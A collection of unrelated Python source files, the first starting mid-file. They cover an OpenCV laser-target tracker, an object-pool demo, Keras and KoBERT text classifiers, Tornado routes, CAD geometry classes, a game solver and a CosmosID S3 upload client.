cv2.destroyWindow("Calibration")
def run(self):
"""Main loop function
"""
print("Running target")
#open video capture
cap = cv2.VideoCapture(0)
#running flag
running = True
#main while loop
while running:
#read frame
ret, frame = cap.read()
#check if targets exist
if len(self.target_image_set)>0:
#show frame
for idx, t_i in enumerate(self.target_image_set):
cv2.imshow("Target - {}".format(idx), t_i)
else:
cv2.imshow('frame', frame)
#if no targets made
if len(self.targets) == 0:
print("Please, mark the targets")
#if targets exists
else:
#get red channel
red_frame = np.array(frame[:,:,2])
#threshold the frame
red_frame[red_frame < self.red_threshold] = 0
#apply the mask
#red_frame[self.target_mask<255] = 0
#get shot status
shot_status = self.detect_shot(red_frame)
#if shot detected
if shot_status is not None:
print("Shots detected!")
#check if it is the first detected frame
if self.wait == False:
#set hit status
hit_status = False
#for each target in list
for idx, t in enumerate(self.targets):
#check if shot is inside the target
if t.inside_target(shot_status):
print("Target [{}] HIT".format(t.get_id()))
#self.target_image_set[idx] = t.get_target_image()
relative_shot = t.update_target(shot_status)
cv2.circle(self.target_image_set[idx],
relative_shot,
3,
(0, 0, 255),
-1)
hit_status = True
#check if hits were registered
if hit_status == False:
#if no hits was inside the target
print("Mike!")
#Check if this is correct
self.wait = True
else:
self.wait = False
keypress = cv2.waitKey(1) & 0xFF
#Break is q pressed
if keypress == ord('q'):
break
#make target if t is pressed
elif keypress == ord('t'):
self.make_target(frame)
#calibrate red threshold
elif keypress == ord('c'):
self.calibrate_red(cap)
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
if __name__ == "__main__":
t1 = Range()
t1.run() |
# Создаем класс ресурсов
class Resource:
# Устанавливаем значение по умолчанию
__value = 'Free'
# Функция возврата в исходное состояние
def reset(self):
self.__value = 'Free'
# Функция установки значения соединения
def setValue(self, str):
self.__value = 'Using', str
# Функия получения значения соединения
def getValue(self):
return self.__value
# Создаем класс пул объектов 1
class ObjectPool1:
# Создаем список, в который будем помещать ресурсы, выделенные данным пулом
__child = list()
# Устанавливаем тип для соединения
__connection = None
# Создаем список для ресурсов
__resources = list()
# Создаем экземпляр класса
def __init__(self):
if ObjectPool1.__connection != None:
raise NotImplemented("This is a singleton class.")
@staticmethod
def getInstance():
if ObjectPool1.__connection == None:
ObjectPool1.__connection = ObjectPool1()
return ObjectPool1.__connection
# Функция предоставления соединения
def getResource(self):
# Если в данном пуле уже есть свободный ресурс, используем его
if len(self.__resources) > 0:
print("Using existing resource.")
# При этом удаляем его из списка ресурсов
return self.__resources.pop(0)
else:
# Если ресурсов нет, создаем новый
print("Creating new resource.")
res = Resource()
# При создании ресурса добавляем его в список "дочерних" ресурсов,
# чтобы в дальнейшем предотвратить вмешательства соединений из другого пула
self.__child.append(res)
return res
# Функция возвращения ресурса
def returnResource(self, resource):
# Проверяем этим ли пулом был предоставлен ресурс
if resource in self.__child:
print("\nReturn in Pool1")
# Возвращаем русерс
resource.reset()
# Добавляем в список свободных ресурсов
self.__resources.append(resource)
# Если ресурс был выдан не этим пулом, то выводим сообщение об отсутствии доступа
else:
print("\nNot access to Pool1")
# Аналогично первому создаем второй пул
class ObjectPool2:
__child = list()
__connection = None
__resources = list()
def __init__(self):
if ObjectPool2.__connection != None:
raise NotImplemented("This is a singleton class.")
@staticmethod
def getInstance():
if ObjectPool2.__connection == None:
ObjectPool2.__connection = ObjectPool2()
return ObjectPool2.__connection
def getResource(self):
if len(self.__resources) > 0:
print("Using existing resource.")
return self.__resources.pop(0)
else:
print("Creating new resource.")
res = Resource()
self.__child.append(res)
return res
def returnResource(self, resource):
if resource in self.__child:
print("\nReturn in Pool")
resource.reset()
self.__resources.append(resource)
else:
print("\nNot access to Pool")
# Фукнция main
def main():
# Создаем два пула объектов
pool1 = ObjectPool1.getInstance()
pool2 = ObjectPool2.getInstance()
# Выводим созданные объекты
print("Pool1", pool1, '\nPool2', pool2)
# Вызываем функции предоставления ресурса из разных пулов
one = pool1.getResource()
two = pool1.getResource()
three = pool2.getResource()
# Устанавливаем значения ресурсов
one.setValue('1')
two.setValue('2')
three.setValue('3')
# Выводим предоставленные ресурсы и их значения
print("%s = %s" % (one, one.getValue()))
print("%s = %s" % (two, two.getValue()))
print("%s = %s" % (three, three.getValue()))
# Пробуем вернуть в пул 2 пресурс из первого пула
pool2.returnResource(one)
# Выводим ресурс и значение ресурса после возврата
print("%s = %s" % (one, one.getValue()))
# Возвращаем ресурс из первого пула в первый пул
pool1.returnResource(two)
# Выводим ресурс и значение ресурса после возврата
print("%s = %s" % (two, two.getValue()))
# Пробуем вернуть в пул 1 пресурс из пула 2
pool1.returnResource(three)
# Выводим ресурс и значение ресурса после возврата
print("%s = %s" % (three, three.getValue()))
# Вызываем функцию предоставления ресурсов для разных пулов
one = pool2.getResource()
two = pool1.getResource()
three = pool2.getResource()
# Устанавливаем значения
one.setValue('4')
two.setValue('5')
three.setValue('6')
# Выводим предоставленные ресурсы и их значения
print("%s = %s" % (one, one.getValue()))
print("%s = %s" % (two, two.getValue()))
print("%s = %s" % (three, three.getValue()))
if __name__ == "__main__":
main()
|
import numpy
from numpy import array
from numpy import asarray
from numpy import zeros
import pandas as pd
from sklearn.feature_extraction.text import HashingVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from keras.preprocessing.text import Tokenizer
from keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau
from matplotlib import pyplot as plt
from keras import optimizers
from sklearn.metrics import classification_report
from keras.models import Model
from keras.layers import Input, Dense, Embedding, concatenate, Flatten
from keras.layers import Dense, SimpleRNN, GRU, LSTM, Embedding
from keras.layers import CuDNNGRU, Bidirectional, GlobalAveragePooling1D, GlobalMaxPooling1D
from keras.models import Sequential
from keras.preprocessing import text, sequence
from sklearn.metrics import f1_score
train = pd.read_csv('train_75.csv')
test = pd.read_csv('valid_25.csv')
maxlen = 150
max_features = 50000
embedding_size=300
X_train = train["question_text"].fillna("dieter").values
X_test = test["question_text"].fillna("dieter").values
y_train= train["target"]
y_test=test["target"]
t = Tokenizer()
t.fit_on_texts(list(X_train) + list(X_test))
vocab_size = len(t.word_index) + 1
X_train = t.texts_to_sequences(X_train)
X_test = t.texts_to_sequences(X_test)
X_train = sequence.pad_sequences(X_train, maxlen=maxlen)
X_test = sequence.pad_sequences(X_test, maxlen=maxlen)
embeddings_index = dict()
f = open('GoogleNews-vectors-negative300.txt')
for line in f:
values = line.split()
word = values[0]
coefs = asarray(values[1:], dtype='float32')
embeddings_index[word] = coefs
f.close()
embedding_matrix = zeros((vocab_size, 300))
for word, i in t.word_index.items():
embedding_vector = embeddings_index.get(word)
if embedding_vector is not None:
embedding_matrix[i] = embedding_vector
model = Sequential() # Call Sequential to initialize a network
model.add(Embedding(vocab_size, 300, weights=[embedding_matrix], input_length=maxlen, trainable=False))
model.add(Flatten())
model.add(Dense(200, activation='relu'))
model.add(Dense(200, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc'])
print(model.summary())
model.fit(X_train, y_train, epochs=1,batch_size=500)
# evaluate the model
print "4"
y_pred=model.predict_classes(X_test)
print f1_score(y_test,y_pred)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import _env # noqa
from _base import BaseHandler, LoginHandler
from misc._route import route
@route('/login')
class Login(BaseHandler):
def get(self):
self.render()
@route('/reg')
class Reg(BaseHandler):
def get(self):
self.render()
@route('/')
class Index(BaseHandler):
def get(self):
self.render()
@route('/course')
class Course(BaseHandler):
def get(self):
self.render()
@route('/logout')
class Logout(LoginHandler):
def get(self):
self.clear_cookie('user')
self.redirect('/')
|
mInput = raw_input()
message = ''
for i in range(len(mInput)):
if mInput[i] in ['a','e','i','o','u','A','E','I','O','U'] and i % 2 == 0:
message += 'A'
elif mInput[i] in ['a','e','i','o','u','A','E','I','O','U'] and i % 2 == 1:
message += 'a'
else:
message += mInput[i]
print message
|
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 5 19:03:40 2021
@author: PC
"""
import pandas as pd
import numpy as np
np.random.seed(456)
import re
from tqdm import tqdm
import matplotlib.pyplot as plt
import os
import json
from konlpy.tag import Okt
import sklearn
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import log_loss, accuracy_score,f1_score
import tensorflow as tf
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint
from transformers import BertTokenizer, BertModel, TFBertModel
from transformers import BertConfig, BertForSequenceClassification
from transformers import AdamW
from transformers import AutoTokenizer, AutoModel
from transformers import BertTokenizer, BertModel
from tokenization_kobert import KoBertTokenizer
from transformers import BertModel, DistilBertModel
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
# 텐서플로가 첫 번째 GPU만 사용하도록 제한
try:
tf.config.experimental.set_visible_devices(gpus[0], 'GPU')
except RuntimeError as e:
# 프로그램 시작시에 접근 가능한 장치가 설정되어야만 합니다
print(e)
train=pd.read_csv('../train.csv')
test=pd.read_csv('../test.csv')
sample_submission=pd.read_csv('../sample_submission.csv')
train=train[['과제명', '요약문_연구내용','요약문_한글키워드','label']]
test=test[['과제명', '요약문_연구내용','요약문_한글키워드']]
train['요약문_연구내용'].fillna('NAN', inplace=True)
test['요약문_연구내용'].fillna('NAN', inplace=True)
train['요약문_한글키워드'].fillna('NAN', inplace=True)
test['요약문_한글키워드'].fillna('NAN', inplace=True)
train['data']=train['과제명']+train['요약문_연구내용']+train['요약문_한글키워드']
test['data']=test['과제명']+test['요약문_연구내용']+test['요약문_한글키워드']
# data label
train.index = range(0, len(train))
train['data'] = train['data'].str.replace(r'[-=+,#/\?:^$.@*\"※~>`\'…》\\n\t]+', " ", regex=True)
test['data'] = test['data'].str.replace(r'[-=+,#/\?:^$.@*\"※~>`\'…》]', " ", regex=True)
train['data'] = train['data'].str.replace(r'\t+', " ", regex=True)
test['data'] = test['data'].str.replace(r'\t+', " ", regex=True)
train['data'] = train['data'].str.replace(r'[\\n]+'," ", regex=True)
test['data'] = test['data'].str.replace(r'[\\n]+'," ", regex=True)
train['data'] = train['data'].str.replace(r'[-+]?\d+'," ", regex=True)
test['data'] = test['data'].str.replace(r'[-+]?\d+'," ", regex=True)
train['data'] = train['data'].str.replace("[^가-힣ㄱ-하-ㅣ]", " ", regex=True)
test['data'] = test['data'].str.replace("[^가-힣ㄱ-하-ㅣ]", " ", regex=True)
print(train.head(5))
print(test.head(5))
tokenizer = KoBertTokenizer.from_pretrained('monologg/kobert')
import collections
def convert_data(data_df):
global tokenizer
SEQ_LEN = 512 #SEQ_LEN : 버트에 들어갈 인풋의 길이
tokens, masks, segments, targets = [], [], [], []
for i in tqdm(range(len(data_df))):
# token : 문장을 토큰화함
# token = tokenizer.encode(data_df[DATA_COLUMN][i], max_length=SEQ_LEN, pad_to_max_length=True)
token = tokenizer.tokenize(data_df[DATA_COLUMN][i], max_length=SEQ_LEN, pad_to_max_length=True)
token = tokenizer.convert_tokens_to_ids(token)
# 마스크는 토큰화한 문장에서 패딩이 아닌 부분은 1, 패딩인 부분은 0으로 통일
num_zeros = token.count(0)
mask = [1]*(SEQ_LEN-num_zeros) + [0]*num_zeros
# 문장의 전후관계를 구분해주는 세그먼트는 문장이 1개밖에 없으므로 모두 0
segment = [0]*SEQ_LEN
# 버트 인풋으로 들어가는 token, mask, segment를 tokens, segments에 각각 저장
tokens.append(token)
masks.append(mask)
segments.append(segment)
# 정답(긍정 : 1 부정 0)을 targets 변수에 저장해 줌
targets.append(data_df[LABEL_COLUMN][i])
# tokens, masks, segments, 정답 변수 targets를 numpy array로 지정
tokens = np.array(tokens)
masks = np.array(masks)
segments = np.array(segments)
targets = np.array(targets)
return [tokens, masks, segments], targets
def convert_data2(data_x, data_y):
global tokenizer
global max_len
SEQ_LEN = max_len #SEQ_LEN : 버트에 들어갈 인풋의 길이
tokens, masks, segments, targets = [], [], [], []
for i in tqdm(range(len(data_x))):
# token : 문장을 토큰화함
# token = tokenizer.encode(data_df[DATA_COLUMN][i], max_length=SEQ_LEN, pad_to_max_length=True)
token = data_x[i]
# 마스크는 토큰화한 문장에서 패딩이 아닌 부분은 1, 패딩인 부분은 0으로 통일
num_zeros = (token == 0).sum() #token.count(0)
# print(num_zeros, token)
mask = [1]*(SEQ_LEN-num_zeros) + [0]*num_zeros
# 문장의 전후관계를 구분해주는 세그먼트는 문장이 1개밖에 없으므로 모두 0
segment = [0]*SEQ_LEN
# 버트 인풋으로 들어가는 token, mask, segment를 tokens, segments에 각각 저장
tokens.append(token)
masks.append(mask)
segments.append(segment)
# 정답(긍정 : 1 부정 0)을 targets 변수에 저장해 줌
targets.append(np.argmax(data_y[i]))
# tokens, masks, segments, 정답 변수 targets를 numpy array로 지정
tokens = np.array(tokens)
masks = np.array(masks)
segments = np.array(segments)
targets = np.array(targets)
return [tokens, masks, segments], targets
# 위에 정의한 convert_data 함수를 불러오는 함수를 정의
def load_data(pandas_dataframe):
data_df = pandas_dataframe
data_df[DATA_COLUMN] = data_df[DATA_COLUMN].astype(str)
data_df[LABEL_COLUMN] = data_df[LABEL_COLUMN].astype(int)
data_x, data_y = convert_data(data_df)
return data_x, data_y
# 위에 정의한 convert_data 함수를 불러오는 함수를 정의
def load_data2(data_x, data_y):
data_x, data_y = convert_data2(data_x, data_y)
return data_x, data_y
SEQ_LEN = 512
BATCH_SIZE = 20
# 긍부정 문장을 포함하고 있는 칼럼
DATA_COLUMN = "data"
# 긍정인지 부정인지를 (1=긍정,0=부정) 포함하고 있는 칼럼
LABEL_COLUMN = "label"
# train 데이터를 버트 인풋에 맞게 변환
# Failed to convert a NumPy array to a Tensor (Unsupported object type list).
train_y1, train_x1 = load_data(train)
train_x = tf.ragged.constant(train_x1)
train_y = tf.ragged.constant(train_y1)
# 'tuple' object has no attribute 'astype'
# ValueError: could not broadcast input array from shape (174304,512) into shape (174304
#train_x = tf.convert_to_tensor(train_x1, dtype=tf.float32)
#train_y = tf.convert_to_tensor(train_y1, dtype=tf.float32)
print("...................................................")
print(train_x.dtype)
print(train_y.dtype)
def create_sentiment_bert():
# 버트 pretrained 모델 로드
model = TFBertModel.from_pretrained("monologg/kobert", from_pt=True)
# 토큰 인풋, 마스크 인풋, 세그먼트 인풋 정의
token_inputs = tf.keras.layers.Input((SEQ_LEN,), dtype=tf.int32, name='input_word_ids')
mask_inputs = tf.keras.layers.Input((SEQ_LEN,), dtype=tf.int32, name='input_masks')
segment_inputs = tf.keras.layers.Input((SEQ_LEN,), dtype=tf.int32, name='input_segment')
# 인풋이 [토큰, 마스크, 세그먼트]인 모델 정의
bert_outputs = model([token_inputs, mask_inputs, segment_inputs])
dnn_units = 256 #256
DROPOUT_RATE = 0.2
bert_outputs = bert_outputs[1]
# sentiment_first = tf.keras.layers.Dense(3, activation='softmax', kernel_initializer=tf.keras.initializers.TruncatedNormal(0.02))(bert_outputs)
mid_layer = tf.keras.layers.Dense(dnn_units, activation='relu', kernel_initializer=tf.keras.initializers.TruncatedNormal(0.02))(bert_outputs)
mid_layer2 = tf.keras.layers.Dropout(rate=DROPOUT_RATE)(mid_layer)
sentiment_first = tf.keras.layers.Dense(46, activation='softmax', kernel_initializer=tf.keras.initializers.TruncatedNormal(0.02))(mid_layer2)
sentiment_model = tf.keras.Model([token_inputs, mask_inputs, segment_inputs], sentiment_first)
# 옵티마이저는 간단하게 Adam 옵티마이저 활용
sentiment_model.compile(optimizer=tf.keras.optimizers.Adam(lr=0.00001), loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=False),
metrics=['sparse_categorical_accuracy'])
return sentiment_model
print(train_x.dtype)
print(train_y.dtype)
num_epochs = 1
batch_size = 6
sentiment_model = create_sentiment_bert()
sentiment_model.fit(train_x, train_y, epochs=num_epochs, shuffle=False, batch_size=batch_size)
sentiment_model.save_weights(os.path.join("sentiment_model.h5"))
|
from collections import Counter
n = int(input())
t = [0] * n
d = [False] * n
e = 0
for i in range(n):
op = list(map(int, input().split()))[1:]
t[i] = op[0]
for j in op[1:]:
if j > 0:
if j != t[i]:
d[i] = True
t[i] = j
else:
t[i] += j
for i in range(1, n - 1):
if d[i - 1] and d[i] and d[i + 1]:
e += 1
if d[-1] and d[0] and d[1]:
e += 1
if d[-2] and d[-1] and d[0]:
e += 1
print(sum(t), Counter(d)[True], e)
|
'''
You're a professor teaching Data Science with Python, and you want to visually assess if the grades on your exam follow a particular distribution. Which plot do you use?
'''
# ANSWER
# HISTOGRAM
|
"""
Contains classes used to describe 3d geometry parts
Remark: normally part objects are an ideal candidate for dataclasses, but geometry is a
special case because we need to inherit a base class with a default parameter (namely
virtual), and dataclasses don't play well with that inheritance
"""
from typing import List, Optional
from enum import Enum
from qmt.infrastructure import write_deserialised
class Geo3DPart:
def __init__(self, label: str, fc_name: Optional[str], virtual: bool = False):
"""Base class for a 3D geometric part.
Parameters
----------
label : str
The descriptive name of this new part.
fc_name : str
The name of the 2D/3D freeCAD object that this is built from. Note that if the
label used for the 3D part is the same as the freeCAD label, and that label is
unique, None may be used here as a shortcut.
virtual : bool
Whether the part is virtual or not
(Default value = False)
"""
self.built_fc_name: Optional[str] = None # This gets set on geometry build
self.fc_name = fc_name
self.label = label
self.serial_stl: Optional[str] = None # This gets set on geometry build
self.serial_stp: Optional[str] = None # This gets set on geometry build
self.virtual = virtual
def write_stp(self, file_path=None):
"""Write part geometry to a STEP file.
Returns the STEP file path.
Parameters
----------
file_path : str
(Default value = None)
Returns
-------
file_path
"""
if file_path is None:
file_path = f"{self.label}.stp"
write_deserialised(self.serial_stp, file_path)
return file_path
def write_stl(self, file_path=None):
"""Write part geometry to a STEP file.
Returns the STEP file path.
Parameters
----------
file_path : str
(Default value = None)
Returns
-------
file_path
"""
if file_path is None:
file_path = f"{self.label}.stl"
write_deserialised(self.serial_stl, file_path)
return file_path
class ExtrudePart(Geo3DPart):
def __init__(
self,
label: str,
fc_name: str,
thickness: float,
z0: float = 0.0,
virtual: bool = False,
):
"""Class for geometric extrusions.
Parameters
----------
label : str
The descriptive name of this new part.
fc_name : str
The name of the 2D/3D freeCAD object that this is built from. Note that if the
label used for the 3D part is the same as the freeCAD label, and that label is
unique, None may be used here as a shortcut.
thickness : float
The extrusion thickness.
z0 : float
The starting z coordinate.
(Default value = 0.0)
virtual : bool
Whether the part is virtual or not.
(Default value = False)
"""
self.thickness = thickness
self.z0 = z0
super().__init__(label, fc_name, virtual=virtual)
class WirePart(Geo3DPart):
def __init__(
self,
label: str,
fc_name: str,
thickness: float,
z0: float = 0.0,
virtual: bool = False,
):
"""Class for hexagonal wire.
Parameters
----------
label : str
The descriptive name of this new part.
fc_name : str
The name of the 2D/3D freeCAD object that this is built from. Note that if the
label used for the 3D part is the same as the freeCAD label, and that label is
unique, None may be used here as a shortcut.
thickness : float
The wire thickness.
z0 : float
The starting z coordinate.
(Default value = 0.0)
virtual : bool
Whether the part is virtual or not.
(Default value = False)
"""
self.thickness = thickness
self.z0 = z0
super().__init__(label, fc_name, virtual=virtual)
class WireShellPart(Geo3DPart):
def __init__(
self,
label: str,
fc_name: str,
thickness: float,
target_wire: WirePart,
shell_verts: List[int],
depo_mode: str,
virtual: bool = False,
):
"""Class for the geometry of a wire shell.
Parameters
----------
label : str
The descriptive name of this new part.
fc_name : str
The name of the 2D/3D freeCAD object that this is built from. Note that if the
label used for the 3D part is the same as the freeCAD label, and that label is
unique, None may be used here as a shortcut.
thickness : float
The shell thickness.
target_wire : WirePart
Target wire for coating.
shell_verts : List[int]
Vertices to use when rendering the coating.
depo_mode : str
'depo' or 'etch' defines the positive or negative mask.
virtual : bool
Whether the part is virtual or not.
(Default value = False)
"""
valid_depo_modes = ["depo", "etch"]
if depo_mode not in ["depo", "etch"]:
raise ValueError(
f"{depo_mode} is not a valid depo mode. Options are {valid_depo_modes}"
)
self.thickness = thickness
self.target_wire = target_wire
self.shell_verts = shell_verts
self.depo_mode = depo_mode
super().__init__(label, fc_name, virtual=virtual)
class SAGPart(Geo3DPart):
def __init__(
self,
label: str,
fc_name: str,
thickness: float,
z_middle: float,
t_in: float,
t_out: float,
z0: float = 0.0,
virtual: bool = False,
):
"""Class for selective area growth
Parameters
----------
label : str
The descriptive name of this new part.
fc_name : str
The name of the 2D/3D freeCAD object that this is built from. Note that if the
label used for the 3D part is the same as the freeCAD label, and that label is
unique, None may be used here as a shortcut.
thickness : float
The total SAG thickness.
z_middle : float
The location for the "flare out".
t_in : float
The lateral distance from the 2D profile to the edge of the top bevel.
t_out : float
The lateral distance from the 2D profile to the furthest "flare out"
location.
z0 : float
The starting z coordinate.
(Default value = 0.0)
virtual : bool
Whether the part is virtual or not.
(Default value = False)
"""
self.thickness = thickness
self.z0 = z0
self.z_middle = z_middle
self.t_in = t_in
self.t_out = t_out
super().__init__(label, fc_name, virtual=virtual)
class LithographyPart(Geo3DPart):
def __init__(
self,
label: str,
fc_name: str,
thickness: float,
layer_num: int,
z0: float = 0.0,
litho_base: List[str] = [],
virtual: bool = False,
):
"""Class for lithography.
Parameters
----------
label : str
The descriptive name of this new part.
fc_name : str
The name of the 2D/3D freeCAD object that this is built from. Note that if the
label used for the 3D part is the same as the freeCAD label, and that label is
unique, None may be used here as a shortcut.
thickness : float
The lithography thickness.
layer_num : int
The layer number. Lower numbers go down first, with higher numbers deposited
last.
z0 : float
The starting z coordinate.
(Default value = 0.0)
litho_base : List[str]
The base partNames to use. For multi-step lithography, the bases are just all
merged, so there is no need to list this more than once.
(Default value = [])
virtual : bool
Whether the part is virtual or not.
(Default value = False)
"""
self.thickness = thickness
self.z0 = z0
self.layer_num = layer_num
self.litho_base = litho_base
super().__init__(label, fc_name, virtual=virtual)
|
from difuminado import convertir
import cv2
capture = cv2.VideoCapture('./Videos/cholula_puebla_street_cloudy_afternoon_27082021_1757.mp4')
cont = 0
path = 'Videos/out/Temp_'
outputPath = ''
Path_ = 'Videos/outPut/'
outputPath_ = ''
while (capture.isOpened()):
ret, frame = capture.read()
if (ret == True):
outputPath = path + 'IMG_%04d.jpg' % cont
outputPath_ = Path_ + 'IMG_%04d.jpg' % cont
cv2.imwrite(outputPath, frame)
img = convertir(outputPath,cont)
cv2.imwrite(outputPath_,img)
cont += 1
if (cv2.waitKey(1) == ord('s')):
break
else:
break
capture.release()
cv2.destroyAllWindows() |
DWULT = {
'DRAW': 'D',
'WIN': 'W',
'UNDECIDED': 'U',
'LOSS': 'L',
'TIE': 'T'
}
def solve(primitive, do_move, gen_moves, initial_position):
memo = {}
def solve_position(cur_pos):
### Comment this out to test without memoizing ###
if cur_pos in memo:
return memo[cur_pos]
########
result = primitive(cur_pos)
if result == DWULT['UNDECIDED']:
moves = gen_moves(cur_pos)
new_positions = [do_move(cur_pos, move) for move in moves]
losing_children = [pos for pos in new_positions if solve_position(pos) == DWULT['LOSS']]
# ties and draws not handled yet
result = DWULT['WIN'] if len(losing_children) else DWULT['LOSS']
### Comment this out to test without memoizing ###
memo[cur_pos] = result
########
return result
return solve_position(initial_position())
|
"""Interactions with CosmosID's and S3's APIs regarding file uploads to S3."""
import logging
import os
import sys
import types
import boto3
import requests
from boto3.exceptions import S3UploadFailedError
from boto3.s3.transfer import TransferConfig
from botocore.exceptions import ClientError
from s3transfer.manager import TransferManager
from s3transfer.subscribers import BaseSubscriber
from s3transfer.utils import OSUtils, ReadFileChunk
from cosmosid.api import urls
from cosmosid.api.files import Files
from cosmosid.helpers.exceptions import (
AuthenticationFailed,
NotEnoughCredits,
NotFoundException,
UploadException,
)
from cosmosid.utils import LOCK, do_not_retry_event, requests_retry_session, retry
LOGGER = logging.getLogger(__name__)
KB = 1024
MB = 1024 * KB
GB = 1024 * MB
MULTIPART_THRESHOLD = 1 * GB
MAX_CHUNK_SIZE = 5 * GB
if sys.platform.startswith("win"):
MAX_CHUNK_SIZE = 1.9 * GB
MIN_CHUNK_SIZE = 1 * GB
MAX_CONCURRENCY = 5
class OSUtilsWithCallbacks(OSUtils):
"""Abstruction for manipulations on file[-like] objects."""
def open_file_chunk_reader(self, filename, start_byte, size, callbacks):
return ReadFileChunk.from_filename(
filename, start_byte, size, callbacks, enable_callbacks=True
)
def open_file_chunk_reader_from_fileobj(
self, fileobj, chunk_size, full_file_size, callbacks, close_callbacks=None
):
return ReadFileChunk(
fileobj,
chunk_size,
full_file_size,
callbacks=callbacks,
enable_callbacks=True,
close_callbacks=close_callbacks,
)
class ProgressSubscriber(BaseSubscriber):
"""Progress subscriber for any number of upload threads."""
def __init__(self, filename):
self._filename = filename
self._size = float(os.path.getsize(filename))
self._seen_so_far = 0
self._lock = LOCK
def on_progress(self, future, bytes_transferred, **kwargs):
"""Callback to be invoked when progress is made on transfer."""
with self._lock:
self._seen_so_far += bytes_transferred
percentage = (self._seen_so_far / self._size) * 100
sys.stdout.write(
"\r%s %sMB / %sMB (%.2f%%)"
% (
self._filename,
int(self._seen_so_far / MB),
int(self._size / MB),
percentage,
)
)
sys.stdout.flush()
def create_client(base_url, api_key):
"""Create boto3 s3 client.
Addss methods to the client for CosmosID's and S3's upload/download
operations.
"""
client = boto3.client("s3")
client.base_url = base_url
client.header = {"X-Api-Key": api_key}
client.burl = client.base_url + urls.UPLOAD_BFILE_URL
client.surl = client.base_url + urls.UPLOAD_SFILE_URL
client.create_multipart_upload = types.MethodType(create_multipart_upload, client)
client.abort_multipart_upload = types.MethodType(abort_multipart_upload, client)
client.upload_part = types.MethodType(upload_part, client)
client.put_object = types.MethodType(put_object, client)
client.complete_multipart_upload = types.MethodType(
complete_multipart_upload, client
)
return client
@retry(logger=LOGGER, tries=2)
def create_multipart_upload(self, *args, **kwargs):
"""Requests to CosmosID's API to initiate the multipart upload."""
data = dict(kwargs)
mp_up = requests.put(self.burl, json=data, headers=self.header, timeout=10)
resp = dict()
if mp_up.status_code == requests.codes.ok:
resp = mp_up.json()
return resp
@retry(logger=LOGGER, tries=3)
def abort_multipart_upload(self, *args, **kwargs):
"""Requests to CosmosID's API to do the cleanup.
Amazon S3 retains all the parts until you either complete or abort the
upload. Throughout its lifetime, you are billed for all storage,
bandwidth, and requests for this multipart upload and its associated parts.
"""
data = dict(kwargs)
ab_mp = requests.delete(self.burl, json=data, headers=self.header, timeout=5)
if not ab_mp:
raise Exception
return ab_mp.json()
@retry(logger=LOGGER, tries=3)
def upload_part(self, *args, **kwargs):
"""Uploads data part to S3.
Requests pre-signed URL from CosmosID's API. Uses it to upload data
to S3.
"""
data = dict(kwargs)
resp = None
upload_body = data.pop("Body")
url_ = requests.get(self.burl, json=data, headers=self.header, timeout=5)
if url_.status_code == requests.codes.ok:
resp = requests.put(url_.json(), upload_body)
if resp.headers:
return dict(resp.headers)
raise Exception("Upload issues.")
@retry(logger=LOGGER, tries=3)
def put_object(self, *args, **kwargs):
"""Upload small file.
Requests pre-signed URL from CosmosID's API. Uses it to upload file
to S3."""
data = dict(kwargs)
upload_body = data.pop("Body")
resp = None
url_ = requests.get(self.surl, json=data, headers=self.header)
if url_.status_code == requests.codes.ok:
resp = requests.put(url_.json(), upload_body)
if resp.headers:
return dict(resp.headers)
raise Exception("Upload issues.")
@retry(logger=LOGGER, tries=3)
def complete_multipart_upload(self, *args, **kwargs):
"""Complete multipart upload.
Makes requests to CosmosID's API in order to complete a multipart
upload by assembling previously uploaded parts. It's been mentioned
somwhere in the docs that consequent complete_multipart_uploads are OK
for a short period after the upload is successfully completed.
"""
data = dict(kwargs)
cmp_up = requests.post(self.burl, json=data, headers=self.header, timeout=60)
if cmp_up:
return cmp_up.json()
raise Exception("complete_multipart_upload did not succeed.")
def upload_file(**kwargs):
"""Upload manager."""
filename = kwargs.get("file")
parent_id = kwargs.get("parent_id", None)
base_url = kwargs.get("base_url")
api_key = kwargs.get("api_key")
multipart_chunksize = file_size = os.stat(filename)[6] # get size of file in bytes
client = create_client(base_url=base_url, api_key=api_key)
if file_size > MULTIPART_THRESHOLD: # bigger that 1GB
multipart_chunksize = min(int(file_size / 10), int(MAX_CHUNK_SIZE))
multipart_chunksize = max(multipart_chunksize, int(MIN_CHUNK_SIZE))
LOGGER.info("File size: %s MB", file_size / MB)
LOGGER.info("Chunk size: %s MB", int(multipart_chunksize / MB))
config = TransferConfig(
multipart_threshold=MULTIPART_THRESHOLD,
max_concurrency=MAX_CONCURRENCY,
multipart_chunksize=multipart_chunksize,
)
osutil = OSUtilsWithCallbacks()
# Check if given parent folder exists
if parent_id:
fl_obj = Files(base_url=base_url, api_key=api_key)
res = fl_obj.get_list(parent_id=parent_id, limit=1)
if not res["status"]:
raise NotFoundException("Parent folder for upload does " "not exists.")
transfer_manager = TransferManager(client, config=config, osutil=osutil)
subscribers = [
ProgressSubscriber(filename),
]
_, file_name = os.path.split(filename)
try:
init_url = client.base_url + urls.UPLOAD_INIT_URL
response = requests_retry_session().put(
init_url, json=dict(file_name=file_name), headers=client.header
)
if response.status_code == 402:
raise NotEnoughCredits("Insufficient credits for upload.")
if response.status_code == 403:
raise AuthenticationFailed("Authentication Failed. Wrong API Key.")
if response.status_code == requests.codes.ok:
sources = response.json()
future = transfer_manager.upload(
filename,
sources["upload_source"],
sources["upload_key"],
extra_args=None,
subscribers=subscribers,
)
else:
LOGGER.error(
"File upload inititalisation Failed. " "Response code: %s",
response.status_code,
)
raise UploadException(
"File upload inititalisation Failed. "
"Response code: %s" % response.status_code
)
try:
future.result()
except KeyboardInterrupt:
do_not_retry_event.set()
return
return sources["upload_key"]
# If a client error was raised, add the backwards compatibility layer
# that raises a S3UploadFailedError. These specific errors were only
# ever thrown for upload_parts but now can be thrown for any related
# client error.
except ClientError as error:
raise S3UploadFailedError(
f'Failed to upload {filename} to {"/".join([sources["upload_source"], sources["upload_key"]])}: {error}'
) from error
